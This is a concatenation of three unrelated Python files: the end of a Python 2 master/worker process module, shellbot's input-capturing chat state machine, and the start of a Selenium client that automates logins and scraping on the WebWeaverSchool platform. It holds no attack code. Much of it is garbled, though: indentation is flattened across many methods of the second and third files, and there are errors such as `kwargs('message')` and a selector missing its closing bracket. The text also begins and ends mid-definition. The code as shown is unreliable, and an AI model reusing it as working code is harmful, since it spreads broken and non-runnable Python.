        self.outputs[name] = value
        if self.debug:
            print '%s: send new value %s'%(self.side,name)
        # dirty (not-yet-evaluated) values are transmitted as None
        val = None if value.dirty() else value()
        self.conn.send((NEW_VALUE,(name,val)))
        def push():
            val = None if value.dirty() else value()
            if self.debug:
                print '%s: send push %s, %s'%(self.side,name,val)
            self.conn.send((SET_VALUE,(name,val)))
        self.listeners.append(listen(value,push))

    def atquit(self,f):
        '''Run the given function before a normal quit'''
        self.atquits.append(f)

    def process(self,timeout=0,count=0):
        '''Check for incoming messages from the master.'''
        while self.conn.poll(timeout):
            tag,data = self.conn.recv()
            if self.debug:
                print '%s: recv %s, %s'%(self.side,tag,data)
            if tag==QUIT:
                # run cleanup hooks, acknowledge, then exit the process
                for f in self.atquits:
                    f()
                self.conn.send((QUIT_ACK,()))
                sys.exit()
            elif tag==CREATE_VALUE:
                name,factory = data
                value = factory(self.inputs)
                self.add_output(name,value)
            elif tag==PULL_VALUE:
                # force evaluation of the named output; the result flows
                # back via the push listener installed in add_output
                name = data
                node = self.outputs[name]
                node()
            elif tag==RUN_JOB:
                # Execute function with connection and given extra arguments
                f,args,kwargs = data
                f(self,*args,**kwargs)
            elif not self.inputs.process(tag,data):
                raise ValueError("Unknown tag '%s'"%tag)
            count -= 1
            if not count:
                break
def worker_main(conn,debug):
    # service master messages forever (until a QUIT arrives, which exits)
    conn = Connection('worker',conn,debug=debug)
    conn.process(timeout=None)


def worker_standalone_main(key):
    """Entry point for subprocess-launched workers; *key* packs
    'debug,port,authkey' for connecting back to the master's Listener."""
    debug,port,authkey = key.split(',')
    debug = debug=='1'
    port = int(port)
    conn = multiprocessing.connection.Client(('localhost',port),authkey=authkey)
    worker_main(conn,debug)
class QuitAck(BaseException):
    # raised out of Worker.process() when the worker acknowledges QUIT;
    # derives from BaseException so ordinary handlers don't swallow it
    pass
class Worker(object):
    """Master-side handle to a worker process, exchanging Values and jobs
    over a multiprocessing connection.  Must be used as a context
    manager; __exit__ shuts the worker down (peacefully if possible)."""

    def __init__(self,debug=False,quit_timeout=1.,command=None,accept_timeout=2.):
        '''Create a new worker process with two way communication via Value objects.
        The worker blocks until told to launch values or jobs.

        If command is specified, the worker is created using subprocess.Popen(command+[key])
        and connected to via Listener/Client rather than the normal multiprocessing.Process
        mechanism. This avoids strange problems with gdb and mpi on Mac. The worker should
        immediately call worker_standalone_main.'''
        self.debug = debug
        # most methods assert inside_with: the with-statement protocol is
        # required so shutdown is guaranteed
        self.inside_with = False
        self.command = command
        if command is None:
            # in-process fork via multiprocessing.Process
            self.conn,child_conn = multiprocessing.Pipe()
            worker = multiprocessing.Process(target=worker_main,args=(child_conn,debug))
            worker.start()
            self.worker_is_alive = worker.is_alive
            self.worker_join = worker.join
            self.worker_terminate = worker.terminate
        else:
            # standalone subprocess connecting back over an authenticated
            # localhost socket
            key = base64_encode(os.urandom(32))
            listener = multiprocessing.connection.Listener(('localhost',0),authkey=key)
            worker = self.worker = subprocess.Popen(command+['%d,%d,%s'%(bool(debug),listener.address[1],key)],shell=is_windows()) # shell=True is required on Windows, but doesn't work on Mac
            # Ugly hack to avoid blocking forever if client never shows up.
            # Borrowed from http://stackoverflow.com/questions/357656/proper-way-of-cancelling-accept-and-closing-a-python-processing-multiprocessing
            listener.fileno = lambda:listener._listener._socket.fileno()
            r,w,e = select.select((listener,),(),(),accept_timeout)
            if not r:
                raise RuntimeError('worker process failed to launch')
            self.conn = listener.accept()
            self.worker_is_alive = lambda:worker.poll() is None
            self.worker_terminate = worker.terminate
            self.worker_join = lambda timeout:None
        self.outputs = ValueProxies(self.conn)
        self.listeners = []
        self.crashed = False
        self.quit_timeout = quit_timeout

    def __enter__(self):
        self.inside_with = True
        return self

    def __exit__(self,*args):
        def safe_join(timeout):
            # See http://stackoverflow.com/questions/1238349/python-multiprocessing-exit-error for why we need this try block.
            try:
                self.worker_join(timeout)
            except OSError,e:
                if e.errno != errno.EINTR:
                    raise
        if self.debug:
            print 'master: send quit'
        # First try telling the process to quit peacefully
        self.conn.send((QUIT,()))
        # Wait a little while for a quit acknowledgement. This is necessary for clean shutdown.
        try:
            self.process(timeout=self.quit_timeout)
        except QuitAck:
            pass
        # Attempt to join with the child process peacefully
        safe_join(self.quit_timeout)
        # If the peaceful method doesn't work, use force
        self.worker_terminate()
        safe_join(None)

    def add_props(self,props):
        # mirror every property in *props* to the worker
        for name in props.order:
            self.add_input(name,props.get(name))

    def add_input(self,name,value):
        """Publish *value* to the worker and keep it updated on change."""
        assert self.inside_with
        if self.debug:
            print 'master: send new value %s, %s'%(name,value())
        self.conn.send((NEW_VALUE,(name,value())))
        def changed():
            if self.debug:
                print 'master: send set value %s, %s'%(name,value())
            self.conn.send((SET_VALUE,(name,value())))
        self.listeners.append(listen(value,changed))

    def process(self,timeout=0,count=0):
        '''Check for incoming messages from the worker.'''
        assert self.inside_with
        remaining = 1e10 if timeout is None else timeout
        while 1:
            # Poll without hanging if the worker process dies
            if remaining<0:
                return # Ran out of time
            if not self.worker_is_alive():
                self.crashed = True
                raise IOError('worker process crashed')
            # Don't wait for too long in order to detect crashes
            pause = min(remaining,.21)
            if self.conn.poll(pause):
                # Process message
                tag,data = self.conn.recv()
                if self.debug:
                    print 'master: recv %s, %s'%(tag,data)
                if tag==QUIT_ACK:
                    raise QuitAck()
                if not self.outputs.process(tag,data):
                    raise ValueError("Unknown tag '%s'"%tag)
                count -= 1
                if not count:
                    return # Hit message limit
            elif not pause:
                break
            remaining -= pause

    def wait_for_output(self,name):
        # block (processing messages) until the worker publishes *name*
        while not self.outputs.contains(name):
            self.process(timeout=None,count=1)
        return self.outputs.get(name)

    def create(self,name,factory):
        '''Create a node on the worker and wait for acknowledgement.'''
        assert self.inside_with
        if self.debug:
            print 'master: send create node %s'%name
        self.conn.send((CREATE_VALUE,(name,factory)))
        return self.wait_for_output(name)

    def pull(self,name):
        # ask the worker to evaluate a node; the value arrives later via
        # the worker's push listener
        if self.debug:
            print 'master: send pull node %s'%name
        self.conn.send((PULL_VALUE,name))

    def run(self,f,*args,**kwargs):
        '''Execute f(conn,*args,**kwargs) on the worker process.
        If f is long running, it should periodically call conn.process(...).'''
        if self.debug:
            print 'master: send run job %s'%f
        self.conn.send((RUN_JOB,(f,args,kwargs)))
|
input.py | # -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from multiprocessing import Manager, Process, Queue
import re
import time
from shellbot.i18n import _
from .base import Machine
class Input(Machine):
"""
Asks for some input
This implements a state machine that can get one piece of input
from chat participants. It can ask a question, wait for some input,
check provided data and provide guidance when needed.
Example::
machine = Input(bot=bot, question="PO Number?", key="order.id")
machine.start()
...
In normal operation mode, the machine asks a question in the chat space,
then listen for an answer, captures it, and stops.
When no adequate answer is provided, the machine will provide guidance
in the chat space after some delay, and ask for a retry. Multiple retries
can take place, until correct input is provided, or the machine is
timed out.
The machine can also time out after a (possibly) long duration, and send
a message in the chat space when giving up.
If correct input is mandatory, no time out will take place and the machine
will really need a correct answer to stop.
Data that has been captured can be read from the machine itself.
For example::
value = machine.get('answer')
If the machine is given a key, this is used for feeding the bot store.
For example::
machine.build(key='my_field', ...)
...
value = bot.recall('input')['my_field']
The most straightforward way to process captured data in real-time
is to subclass ``Input``, like in the following example::
class MyInput(Input):
def on_input(self, value):
mail.send_message(value)
machine = MyInput(...)
machine.start()
"""
ANSWER_MESSAGE = _(u"Ok, this has been noted")
RETRY_MESSAGE = _(u"Invalid input, please retry")
CANCEL_MESSAGE = _(u"Ok, forget about it")
RETRY_DELAY = 20.0 # amount of seconds between retries
CANCEL_DELAY = 40.0 # amount of seconds before time out
    def on_init(self,
                question=None,
                question_content=None,
                mask=None,
                regex=None,
                on_answer=None,
                on_answer_content=None,
                on_answer_file=None,
                on_retry=None,
                on_retry_content=None,
                on_retry_file=None,
                retry_delay=None,
                on_cancel=None,
                on_cancel_content=None,
                on_cancel_file=None,
                cancel_delay=None,
                is_mandatory=False,
                key=None,
                **kwargs):
        r"""
        Asks for some input

        :param question: Message to ask for some input
        :type question: str

        :param question_content: Rich message to ask for some input
        :type question_content: str

        :param mask: A mask to filter the input
        :type mask: str

        :param regex: A regular expression to filter the input
        :type regex: str

        :param on_answer: Message on successful data capture
        :type on_answer: str

        :param on_answer_content: Rich message on successful data capture
        :type on_answer_content: str in Markdown or HTML format

        :param on_answer_file: File to be uploaded on successful data capture
        :type on_answer_file: str

        :param on_retry: Message to provide guidance and ask for retry
        :type on_retry: str

        :param on_retry_content: Rich message on retry
        :type on_retry_content: str in Markdown or HTML format

        :param on_retry_file: File to be uploaded on retry
        :type on_retry_file: str

        :param retry_delay: Repeat the on_retry message after this delay in seconds
        :type retry_delay: int

        :param on_cancel: Message on time out
        :type on_cancel: str

        :param on_cancel_content: Rich message on time out
        :type on_cancel_content: str in Markdown or HTML format

        :param on_cancel_file: File to be uploaded on time out
        :type on_cancel_file: str

        :param is_mandatory: If the bot will insist and never give up
        :type is_mandatory: boolean

        :param cancel_delay: Give up on this input after this delay in seconds
        :type cancel_delay: int

        :param key: The label associated with data captured in bot store
        :type key: str

        If a mask is provided, it is used to filter provided input.
        Use following conventions to build the mask:

        * ``A`` - Any kind of unicode symbol such as ``g`` or ``ç``
        * ``9`` - A digit such as ``0`` or ``2``
        * ``+`` - When following ``#`` or ``9``, indicates optional extensions
          of the same type
        * Any other symbol, including punctuation or white space, has to match
          exactly.

        For example:

        * ``9999A`` will match 4 digits and 1 additional character
        * ``#9-A+`` will match ``#3-June 2017``

        Alternatively, you can provide a regular expression (regex) to extract
        useful information from the input.

        You can use almost every regular expression that is supported
        by python. If parenthesis are used, the function returns the first
        matching group.

        For example, you can capture an identifier with a given prefix::

            machine.build(question="What is the identifier?",
                          regex=r'ID-\d\w\d+', ...)
            ...
            id = machine.filter('The id is ID-1W27 I believe')
            assert id == 'ID-1W27'

        As a grouping example, you can capture a domain name by asking for
        some e-mail address like this::

            machine.build(question="please enter your e-mail address",
                          regex=r'@([\w.]+)', ...)
            ...
            domain_name = machine.filter('my address is foo.bar@acme.com')
            assert domain_name == 'acme.com'
        """
        # we need something to ask, either as plain text or as rich content
        assert question or question_content
        self.question = question
        self.question_content = question_content
        assert regex is None or mask is None  # use only one of them
        self.regex = regex
        self.mask = mask
        self.on_answer = on_answer
        self.on_answer_content = on_answer_content
        self.on_answer_file = on_answer_file
        self.on_retry = on_retry
        self.on_retry_content = on_retry_content
        self.on_retry_file = on_retry_file
        self.on_cancel = on_cancel
        self.on_cancel_content = on_cancel_content
        self.on_cancel_file = on_cancel_file
        assert is_mandatory in (True, False)
        self.is_mandatory = is_mandatory
        if retry_delay is not None:
            assert float(retry_delay) > 0
            self.RETRY_DELAY = float(retry_delay)  # instance attr shadows class default
        if cancel_delay is not None:
            assert float(cancel_delay) > 0
            self.CANCEL_DELAY = float(cancel_delay)  # instance attr shadows class default
        assert self.CANCEL_DELAY > self.RETRY_DELAY
        self.key = key
        states = ['begin',
                  'waiting',
                  'delayed',
                  'end']
        transitions = [
            {'source': 'begin',
             'target': 'waiting',
             'action': self.ask},

            {'source': 'waiting',
             'target': 'end',
             'condition': lambda **z : self.get('answer') is not None,
             'action': self.stop},

            {'source': 'waiting',
             'target': 'delayed',
             'condition': lambda **z : self.elapsed > self.RETRY_DELAY,
             'action': self.say_retry,
             },

            {'source': 'delayed',
             'target': 'end',
             'condition': lambda **z : self.get('answer') is not None,
             'action': self.stop},

            {'source': 'delayed',
             'target': 'end',
             'condition': lambda **z : self.elapsed > self.CANCEL_DELAY and not self.is_mandatory,
             'action': self.cancel},
        ]
        # NOTE(review): ``during`` is built but never passed to build() below --
        # confirm whether ``self.build(..., during=during)`` was intended.
        during = {
            'begin': self.on_inbound,
            'waiting': self.on_inbound,
            'delayed': self.on_inbound,
            'end': self.on_inbound,
        }
        self.build(states=states,
                   transitions=transitions,
                   initial='begin')
        self.start_time = time.time()
@property
def elapsed(self):
"""
Measures time since the question has been asked
Used in the state machine for repeating the question and on time out.
"""
return time.time() - self.start_time
def say_answer(self, input):
"""
Responds on correct capture
:param input: the text that has been noted
:type input: str
"""
text = self.on_answer.format(input) if self.on_answer else None
content = self.on_answer_content.format(input) if self.on_answer_content else None
file = self.on_answer_file if self.on_answer_file else None
if not text and not content:
text = self.ANSWER_MESSAGE.format(input)
self.bot.say(text)
if content or file:
self.bot.say(' ',
content=content,
file=file)
def say_retry(self):
"""
Provides guidance on retry
"""
text = self.on_retry if self.on_retry else None
content = self.on_retry_content if self.on_retry_content else None
file = self.on_retry_file if self.on_retry_file else None
if not text and not content:
text = self.RETRY_MESSAGE
self.bot.say(text)
if content or file:
self.bot.say(' ',
content=content,
file=file)
def say_cancel(self):
"""
Says that input has been timed out
"""
text = self.on_cancel if self.on_cancel else None
content = self.on_cancel_content if self.on_cancel_content else None
file = self.on_cancel_file if self.on_cancel_file else None
if not text and not content:
text = self.CANCEL_MESSAGE
self.bot.say(text)
if content or file:
self.bot.say(' ',
content=content,
file=file)
def ask(self):
"""
Asks the question in the chat space
"""
text = self.question if self.question else None
content = self.question_content if self.question_content else None
self.bot.say(text)
if content:
self.bot.say(' ',
content=content)
self.start_time = time.time()
self.listen()
def listen(self):
"""
Listens for data received from the chat space
This function starts a separate process to scan the
``bot.fan`` queue until time out.
"""
p = Process(target=self.receive)
p.daemon = True
p.start()
return p
    def receive(self):
        """
        Receives data from the chat space

        This function implements a loop until some data has been
        actually captured, or until the state machine stops for some reason.

        The loop is also stopped when the parameter ``general.switch``
        is changed in the context. For example::

            engine.set('general.switch', 'off')
        """
        logging.info(u"Receiving input")
        self.set('answer', None)  # reset any previous capture
        try:
            while self.bot.engine.get('general.switch', 'on') == 'on':
                if self.get('answer'):
                    break  # on good answer
                if not self.is_running:
                    break  # on machine stop
                try:
                    if self.bot.fan.empty():
                        # heartbeat: record in the context that we are polling
                        label = 'fan.' + self.bot.id
                        self.bot.engine.set(label, time.time())
                        time.sleep(self.TICK_DURATION)
                        continue
                    item = self.bot.fan.get(True, self.TICK_DURATION)
                    if item is None:
                        break  # poison pill: stop receiving
                    logging.debug(u"Input has been received")
                    self.execute(arguments=item)
                except Exception as feedback:
                    # any error during capture ends the loop; log for diagnosis
                    logging.exception(feedback)
                    break
        except KeyboardInterrupt:
            pass
        logging.info(u"Input receiver has been stopped")
def execute(self, arguments=None, **kwargs):
"""
Receives data from the chat
:param arguments: data captured from the chat space
:type arguments: str
This function checks data that is provided, and provides guidance
if needed. It can extract information from the provided mask
or regular expression, and save it for later use.
"""
if not arguments:
self.say_retry()
return
arguments = self.filter(text=arguments)
if not arguments:
self.say_retry()
return
# store at machine level
self.set('answer', arguments)
# store at bot level
if self.key:
self.bot.update('input', self.key, arguments)
# use the input in this instance as well
self.on_input(value=arguments, **kwargs)
# advertise subscribers
if self.key:
self.bot.publisher.put(
self.bot.id,
{'from': self.bot.id,
'input': {'key': self.key, 'value': arguments}})
self.say_answer(arguments)
self.step(event='tick')
def filter(self, text):
"""
Filters data from user input
:param text: Text coming from the chat space
:type text: str
:return: Data to be captured, or None
If a mask is provided, or a regular expression, they are used
to extract useful information from provided data.
Example to read a PO mumber::
machine.build(mask='9999A', ...)
...
po = machine.filter('PO Number is 2413v')
assert po == '2413v'
"""
if self.mask:
return self.search_mask(self.mask, text)
if self.regex:
return self.search_expression(self.regex, text)
return text
def search_mask(self, mask, text):
"""
Searches for structured data in text
:param mask: A simple expression to be searched
:type mask: str
:param text: The string from the chat space
:type text: str
:return: either the matching expression, or None
Use following conventions to build the mask:
* ``A`` - Any kind of unicode symbol, such as ``g`` or ``ç``
* ``9`` - A digit, such as ``0`` or ``2``
* ``+`` - When following ``#`` or ``9``, indicates optional extensions
of the same type
* Any other symbol, including punctuation or white space, has to match
exactly.
Some mask examples:
* ``9999A`` will match 4 digits and 1 additional character
* ``#9-A+`` will match ``#3-June 2017``
Example to read a PO mumber::
machine.build(question="What is the PO number?",
mask='9999A', ...)
...
po = machine.filter('PO Number is 2413v')
assert po == '2413v'
"""
assert mask
assert text
logging.debug(u"Searching for mask '{}'".format(mask))
mask = mask.replace('+', 'pLuS')
mask = re.escape(mask)
mask = mask.replace('pLuS', '+').replace('A', '\S').replace('9', '\d').replace('Z','[^0-9]')
logging.debug(u"- translated to expression '{}'".format(mask))
pattern = re.compile(mask, re.U)
searched = pattern.search(text)
if not searched:
logging.debug(u"- no match")
return None
matched = searched.group()
logging.debug(u"- found '{}'".format(matched))
return matched
    def search_expression(self, regex, text):
        r"""
        Searches for a regular expression in text

        :param regex: A regular expression to be matched
        :type regex: str

        :param text: The string from the chat space
        :type text: str

        :return: either the matching expression, or None

        You can use almost every regular expression that is supported
        by python. If parenthesis are used, the function returns the first
        matching group.

        For example, you can capture an identifier with a given prefix::

            machine.build(question="What is the identifier?",
                          regex=r'ID-\d\w\d+', ...)
            ...
            id = machine.filter('The id is ID-1W27 I believe')
            assert id == 'ID-1W27'

        As a grouping example, you can capture a domain name by asking for
        some e-mail address like this::

            machine.build(question="please enter your e-mail address",
                          regex=r'@([\w.]+)', ...)
            ...
            domain_name = machine.filter('my address is foo.bar@acme.com')
            assert domain_name == 'acme.com'
        """
        assert regex
        assert text
        logging.debug(u"Searching for expression '{}'".format(regex))
        # case-insensitive search over the whole text
        pattern = re.compile(regex, re.I)
        searched = pattern.search(text)
        if not searched:
            logging.debug(u"- no match")
            return None
        matched = searched.group()
        if len(searched.groups()) > 0:  # return the first matching group
            matched = searched.groups()[0]
        logging.debug(u"- found '{}'".format(matched))
        return matched
    def on_input(self, value, **kwargs):
        """
        Processes input data

        :param value: data that has been captured
        :type value: str

        This function is called as soon as some input has been captured.
        It can be overridden in a subclass, as in the following example::

            class MyInput(Input):

                def on_input(self, value):
                    mail.send_message(value)

            machine = MyInput(...)
            machine.start()

        The extra keyword parameters will be used in case of an attachment
        with the value.
        """
        pass
def on_inbound(self, **kwargs):
"""
Updates the chat on inbound message
"""
if kwargs.get('event') != 'inbound':
return
logging.debug(u"Receiving inbound message")
message = kwargs('message')
self.bot.say(_(u"Received {}: {} (from {})").format(
message['input']['key'],
message['input']['value'],
message['from']))
def cancel(self):
"""
Cancels the question
Used by the state machine on time out
"""
self.say_cancel()
self.stop()
|
_agent.py | from typing import *
import time
import json
import threading
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import Select
import selenium.common.exceptions
import win10toast
from .references import *
from . import utils
class Agent:
    def __init__(self, url: str = "", user: str = "", passwd: str = "", hide: bool = True,
                 wait: Union[float, int] = 0.5, no_notification: bool = False, file=None):
        """
        THIS PROJECT WAS CREATED BY A STUDENT. THERE ARE MANY FUNCTIONS THAT ONLY ADMINS HAVE OR THAT HAVE NOT BEEN RELEASED TO ME. THESE ARE NOT INCLUDED.

        :param url: URL of your wws-System.
        :param user: E-Mail of your WebWeaverSchool-Account (Normally name@schoolname.wwsurl.topleveldomain)
        :param passwd: Password of your WebWeaverSchool-Account
        :param hide: True if you don't want
        :param wait: Time the System waits for API-Requests/Page-Builings before starting to act after page-load.
        :param no_notification: Set true if you don't want do see a success notification
        :param file: If set all other params are ignored. Sets the settings in a file
        """
        utils.extra.ensure_chromedriver()  # Ensure the newest chromedriver is installed.
        # Credentials either come from a JSON file or from the parameters.
        if file is not None:
            f = json.load(file)
            self.URL = f["url"]
            self.USER = f["user"]
            self.PASS = f["passwd"]
            self.maw = f["wait"]
        else:
            self.URL = url
            self.USER = user
            self.PASS = passwd
            self.maw = wait
        # Book-keeping for the event loop: windows we created / discovered,
        # pending quickmessages, and a re-entrancy flag.
        self.holdOn = False
        self.genwins = []
        self.parent = self
        self.foundwins = []
        self.quicks = []
        self.acting = True
        opts = webdriver.ChromeOptions()
        opts.headless = hide
        self.driver = webdriver.Chrome('./chromedriver.exe', options=opts)
        self.driver.set_window_size(1500, 1000)
        self._nav("/wws/100001.php")
        # Switch the site language to German: the scraping below matches German labels.
        self.driver.find_element(by=By.CSS_SELECTOR, value="a.language_selection_current_link").click()
        for lang in self.driver.find_elements(by=By.CSS_SELECTOR, value="a.language_selection_option_link"):
            if lang.text == "Deutsch":
                lang.click()
                break
        self.mainwin = self.driver.current_window_handle
        time.sleep(self.maw)
        self.events = Events()
        if not no_notification:
            win10toast.ToastNotifier().show_toast("WWSHC", "WebWeaverSchoolHackClient-Agent erfolgreich gestartet.",
                                                  threaded=True)
        self.acting = False
def hold(self: ClassVar, autostop: bool = True):
"""
Hold the window opened (useless if headless)
:param autostop: Atomatticcally stop holding if the window is closed.
"""
self.holdOn = True
while self.holdOn:
time.sleep(self.maw)
if autostop:
try:
if len(self.driver.window_handles) == 0:
break
else:
pass
except selenium.common.exceptions.InvalidSessionIdException:
break
except selenium.common.exceptions.WebDriverException:
break
@utils.extra.acting()
def quit(self: ClassVar) -> bool:
"""
Close the Window
:return: Success
"""
try:
self.driver.quit()
return True
except selenium.common.exceptions.InvalidSessionIdException:
return False
except selenium.common.exceptions.WebDriverException:
return False
    def _navto(self):
        """
        Navigate to the web-page of this element
        """
        self.check()  # make sure we are logged in before navigating
        self.driver.find_element(by=By.ID, value="top_chapter_first").click()
    def _nav(self, suburl: str):
        """
        Navigate to the given url.

        :param suburl: URL path, relative to self.URL, to navigate to.
        """
        self.driver.get(self.URL + suburl)
        self.check()  # a navigation may land on the login page
def check(self: ClassVar):
"""
Checks if a login is needed and logs in.
"""
try:
time.sleep(self.maw)
self.driver.find_element(by=By.CSS_SELECTOR, value='[html_title="Einloggen"').click()
self.driver.find_element(by=By.ID, value="login_login").send_keys(self.USER)
self.driver.find_element(by=By.ID, value="login_password").send_keys(self.PASS)
self.driver.find_element(by=By.NAME, value="login_submit").click()
except selenium.common.exceptions.NoSuchElementException:
pass
    @utils.extra.acting()
    @cache.cached()
    def class_list(self) -> List[Class]:
        """
        Use this to list all Classes are available for you

        :return: List of Class objects found in the "Meine Klassen" dropdown
        """
        self.check()  # ensure we are logged in
        clss = []
        # every <option> except the placeholder and the separator row is a class
        for c in Select(self.driver.find_element(by=By.CSS_SELECTOR, value='[html_title="Meine Klassen"]')).options:
            if c.text != "Meine Klassen" and c.text != "--------------------------------------":
                clss.append(Class(c.text, self))
        return clss
@utils.extra.acting()
@cache.cached()
def class_get(self, name: str) -> Class:
"""
Use this to get a Class available for you
:raise wwshc.err.NoSuchClass: If the Class is not available for you or is not existing
:param name: Name of the Class you want to have
:return: The Class you requested
"""
self.check()
for c in self.class_list(_ignore=True):
if c.name == name:
self.parent.acting = False
return c
raise utils.exceptions.NoSuchClass(f"No class with name '{name}' found.")
@utils.extra.acting()
@cache.cached()
def groups_list(self: ClassVar) -> List[Group]:
"""
Use this to list all Groups are available for you
:return: List of all Groups
"""
self.check()
grps = []
for g in Select(self.driver.find_element(by=By.CSS_SELECTOR, value='[html_title="Meine Gruppen"')).options:
if g.text != "Meine Gruppen" and g.text != "Gruppenübersicht" and g.text != "--------------------------------------":
grps.append(Group(g.text, self))
return grps
@utils.extra.acting()
@cache.cached()
def groups_get(self, name: str):
"""
Use this to get a Group avalible for you
:raise wwshc.err.NoSuchGroup: If the Group is not avalible for you or is not existing
:param name: Name of the Group you want to have
:return: The Group you requested
"""
self.check()
for g in self.groups_list():
if g.name == name:
self.parent.acting = False
return g
raise utils.exceptions.NoSuchGroup(f"No group with name '{name}' found.")
    @cache.cached()
    @utils.extra.acting()
    def users_list(self, only_online=False, stop_name="", stop_mail=""):
        """
        Use this to list all Users in Contacts

        :param only_online: If you want to list only people who are online.
        :param stop_name: Stop scanning early once a row with this text is seen.
        :param stop_mail: NOTE(review): accepted but never used -- confirm intent.
        :return: List of all Users in Contacts
        """
        self._navto()
        self.driver.find_element(by=By.ID, value="menu_105492").find_element(by=By.TAG_NAME, value="a").click()
        res = []
        if not only_online:
            self.driver.find_element(by=By.LINK_TEXT, value="Alle Mitglieder anzeigen").click()
        for u in self.driver.find_element(by=By.CLASS_NAME, value="table_list").find_element(
                by=By.TAG_NAME, value="tbody").find_elements(by=By.TAG_NAME, value="tr"):
            if not u.text == "":
                # column 3 holds the display name, column 4 the mail address
                res.append(User(u.find_elements(by=By.TAG_NAME, value="td")[3].text,
                                u.find_elements(by=By.TAG_NAME, value="td")[4].text, self, self))
                # NOTE(review): compares the whole row text against stop_name --
                # presumably works because the name dominates the row; verify
                if u.text == stop_name:
                    return res
        return res
    @utils.extra.acting()
    def users_add(self, name_or_mail):
        """
        Add a user to the contact list.

        :param name_or_mail: Name or e-mail of the user to add
        :raise wwshc.err.AlreadyInContacts: if the user is already a contact
        :raise wwshc.err.NoSuchUser: if the platform rejects the user
        """
        try:
            self._navto()
            self.driver.find_element(by=By.ID, value="menu_105492").find_element(by=By.TAG_NAME, value="a").click()
            self.driver.find_element(by=By.LINK_TEXT, value="Mitglied aufnehmen").click()
            time.sleep(self.maw)
            utils.extra.use_popup(self)  # the add-member form opens in a popup
            self.driver.find_element(by=By.NAME, value="add_member").send_keys(name_or_mail)
            try:
                # two submits: first confirms the search, second the addition;
                # the second submit is missing when the user is already a contact
                self.driver.find_element(by=By.CLASS_NAME, value="submit").click()
                self.driver.find_element(by=By.CLASS_NAME, value="submit").click()
            except selenium.common.exceptions.NoSuchElementException:
                raise utils.exceptions.AlreadyInContacts("This User is already in your contact list")
            time.sleep(self.maw)
            utils.extra.use_main(self)
        except selenium.common.exceptions.UnexpectedAlertPresentException as e:
            if e.alert_text == "Kein gültiger Nutzer":
                raise utils.exceptions.NoSuchUser(f"The User {name_or_mail} is not existing.")
            else:
                print(e.alert_text)
@utils.extra.acting()
def users_remove(self, name_or_mail):
self._navto()
self.driver.find_element(by=By.ID, value="menu_105492").find_element(by=By.TAG_NAME, value="a").click()
print(self.driver.find_element(by=By.CLASS_NAME, value="jail_table").find_element(by=By.TAG_NAME, value="tbody")
.find_element(by=By.XPATH, value=f"//*[contains(text(),'{name_or_mail}')]"))
self.driver.find_element(by=By.CLASS_NAME, value="jail_table").find_element(by=By.TAG_NAME, value="tbody") \
.find_element(by=By.XPATH, value=f"//*[contains(text(),'{name_or_mail}')]") \
.find_element(by=By.XPATH, value="..").find_element(by=By.CSS_SELECTOR, value=".icons") \
.find_element(by=By.CSS_SELECTOR, value='[html_title="Weitere Funktionen"]').click()
time.sleep(self.maw)
self.driver.find_element(by=By.CLASS_NAME, value="jail_table").find_element(by=By.TAG_NAME, value="tbody") \
.find_element(by=By.XPATH, value=f"//*[contains(text(),'{name_or_mail}')]") \
.find_element(by=By.XPATH, value="..").find_element(by=By.CSS_SELECTOR, value=".icons") \
.find_element(by=By.XPATH, value=f"//*[contains(text(),'Löschen')]").click()
self.driver.switch_to.alert()
self.driver.close()
self.driver.switch_to.active_element()
@cache.cached()
def users_getByName(self, name: str):
"""
Use this to get a User in Contacts by his Name
:raise wwshc.err.NoSuchUser: If the User cannot be found by your search arguments
:param name: Name of the User you are requesting.
:return: The User you Requested
"""
for u in self.users_list(stop_name=name):
if u.name == name:
return u
raise utils.exceptions.NoSuchUser(f"No user with name '{name}' found.")
@cache.cached()
def users_getByMail(self, mail: str):
"""
Use this to get a User in Contacts by his E-Mail
:raise wwshc.err.NoSuchUser: If the User cannot be found by your search arguments
:param mail: E-Mail of the User you are requesting.
:return: The User you Requested
"""
for u in self.users_list(stop_mail=mail):
if u.mail == mail:
return u
raise utils.exceptions.NoSuchUser(f"No user with mail '{mail}' found.")
    @utils.extra.acting()
    def files_uploadFile(self, filepath):
        """
        Upload a local file into the file storage.

        :param filepath: Absolute path of the file to upload
        """
        self.driver.find_element(by=By.ID, value="menu_121332").find_element(by=By.TAG_NAME, value="a").click()
        self.driver.find_element(by=By.LINK_TEXT, value="Neue Datei ablegen").click()
        time.sleep(self.maw)
        utils.extra.use_popup(self)  # the upload form opens in a popup window
        self.driver.find_element(by=By.NAME, value="file[]").send_keys(filepath)
        self.driver.find_element(by=By.CLASS_NAME, value="submit").click()
        utils.extra.use_main(self)
def files_addFile(self, filepath):
raise NotImplementedError("Cannot add a file.")
def files_removeFile(self, path):
raise NotImplementedError("Cannot remove a file.")
    @utils.extra.acting()
    def files_addFolder(self, name, description=""):
        """
        Create a folder in the file storage.

        :param name: Name of the new folder
        :param description: Optional folder description
        """
        self.driver.find_element(by=By.ID, value="menu_121332").find_element(by=By.TAG_NAME, value="a").click()
        self.driver.find_element(by=By.LINK_TEXT, value="Ordner anlegen").click()
        time.sleep(self.maw)
        utils.extra.use_popup(self)  # the folder form opens in a popup window
        self.driver.find_element(by=By.NAME, value="folder").send_keys(name)
        self.driver.find_element(by=By.NAME, value="description").send_keys(description)
        self.driver.find_element(by=By.CLASS_NAME, value="submit").click()
        utils.extra.use_main(self)
def files_removeFolder(self, path):
"""
*** UNDOCUMENTATED ***
"""
raise NotImplementedError("Cannot remove a folder.")
    @utils.extra.acting()
    @cache.cached()
    def tasks_list(self):
        """
        List all tasks visible on the tasks page.

        :return: List of Task objects (title, author, done-flag)
        """
        self._navto()
        res = []
        self.driver.find_element(by=By.ID, value="menu_105500").find_element(by=By.TAG_NAME, value="a").click()
        for element in self.driver.find_element(by=By.CLASS_NAME, value="jail_table") \
                .find_element(by=By.TAG_NAME, value="tbody").find_elements(by=By.TAG_NAME, value="tr"):
            # sort == "2" appears to mark a finished task -- TODO confirm against UI
